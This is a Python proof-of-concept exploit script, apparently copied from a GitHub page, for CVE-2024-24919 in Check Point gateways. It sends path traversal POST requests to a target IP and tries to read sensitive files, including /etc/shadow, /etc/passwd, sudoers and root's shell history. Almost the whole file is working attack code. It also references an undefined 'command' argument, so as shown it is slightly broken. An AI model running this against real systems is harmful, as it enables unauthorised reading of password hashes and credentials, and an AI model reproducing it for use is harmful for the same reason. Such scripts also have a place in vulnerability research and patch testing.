-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy path24919.py
54 lines (45 loc) · 1.85 KB
/
24919.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#<autor> H3key
#<Exploit LFI Check Point > CVE-2024-24919
#<str> criticals paths
import requests
from argparse import ArgumentParser
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
def exploit(ip, path, command=None):
target = f'https://{ip}/clients/MyCRL'
data = f'aCSHELL/../../../../../../../../../../..{path}'
headers = {
'Host': f'{ip}',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0',
'Te': 'trailers',
'Dnt': '1',
'Connection': 'keep-alive',
'Content-Length': '48'
}
response = requests.post(target, headers=headers, data=data, verify=False)
if response.status_code == 200:
return response.text
else:
return f'Error: received status code {response.status_code}'
if __name__ == '__main__':
parser = ArgumentParser(description='CVE-2024-24919 PoC')
parser.add_argument('-i', '--ip', required=True, help='IP address of the target')
args = parser.parse_args()
critical_paths = [
'/etc/passwd', '/etc/shadow', '/etc/hosts', '/etc/hostname',
'/etc/network/interfaces', '/etc/resolv.conf', '/etc/ssh/sshd_config',
'/var/log/syslog', '/var/log/auth.log', '/root/.bash_history',
'/home/<username>/.bash_history', '/etc/sudoers', '/proc/cpuinfo',
'/proc/meminfo', '/var/spool/cron/crontabs', '/etc/issue',
'/etc/selinux/config', '/boot/grub/grub.cfg', '/etc/fstab', '/proc/version',
'/etc/cron.d/root'
]
try:
for path in critical_paths:
print(f'Attempting to read {path}')
result = exploit(args.ip, path, args.command)
print(f'Result for {path}:\n{result}\n')
except EOFError:
exit(1)
except KeyboardInterrupt:
exit(1)